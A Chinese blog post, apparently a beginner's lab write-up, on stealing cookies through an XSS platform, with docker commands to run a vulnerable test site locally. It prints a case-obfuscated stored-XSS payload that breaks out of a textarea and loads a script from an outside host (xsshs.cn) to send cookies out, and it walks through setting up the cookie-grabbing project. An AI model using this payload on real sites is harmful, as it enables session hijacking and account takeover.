XSS平台获取cookie

学习利用XSS平台获取cookie

今天，我学习xss平台获取cookie的时候，由于各种毛病获取不到cookie。现在复现成功了，所以把过程写出来，记录一下过程，希望对入门的朋友有用。

首先我们得自己搭建环境，互联网是非常危险的。
我平时都是用docker搭建需要的坏境，非常简单。

yum install -y docker	#安装docker
service docker start	#启动docker
docker	search	xss		#在docker搜索xss环境
docker pull	**			#下载** 这个环境，我用的docker.io/c0ny1/xssed
docker run -d -p 8080:80 --name xss docker.io/c0ny1/xssed	#启动xss环境

这样我们通过ip+端口就能访问我们搭建的xss平台了

然后我们在XSS平台注册，自己搭建也可，github上面有教程，因为网上有我就没有自己搭了。

1. 在我的项目里面创建项目名称随意

2. 选项目的时候直接选择默认模块就行了，默认模块也是读取cookie，不要去选下面的读取cookie，因为这个我搞了半天的妖魔鬼怪。无keepsession-cookie会过期，另一个会几分钟刷新一次，cookie不会过期。
3. 然后就会出现下面的代码
4. 复制XSS代码到我们搭建的环境里，提交

</tExtArEa>'"><sCRiPt sRC=//xsshs.cn/FxAp></sCrIpT>

5. 秒秒中复现

中途的妖魔鬼怪

1. 一开始用的一个XSS平台怎么搞也不行。就是它
   换了这个xss平台才行的。链接
   最后我写到这里我又去试了一下，又TM可以了？？？？可能是我太菜了
   因为第二个功能更多，所以推荐大家用第二个XSS平台。
2. 然后就是上面选择的时候尽量选择默认的吧，cookie读取那个，我到现在还没试成功。
3. （当时还在用第一个XSS平台）我把XSS代码写到HTML里面，访问了很久不行，突然发现图标是googlechrome的，灵感一现会不会是google把xss弹窗啥的禁用了，因为以前搞反射型有过，所以道友们，以后测试，多换换浏览器，当然我用火狐也没试出来，IE也用了，【黑脸】
   最后**的，也行了？？？？？
4. 感谢 谢公子 的群友帮忙指导。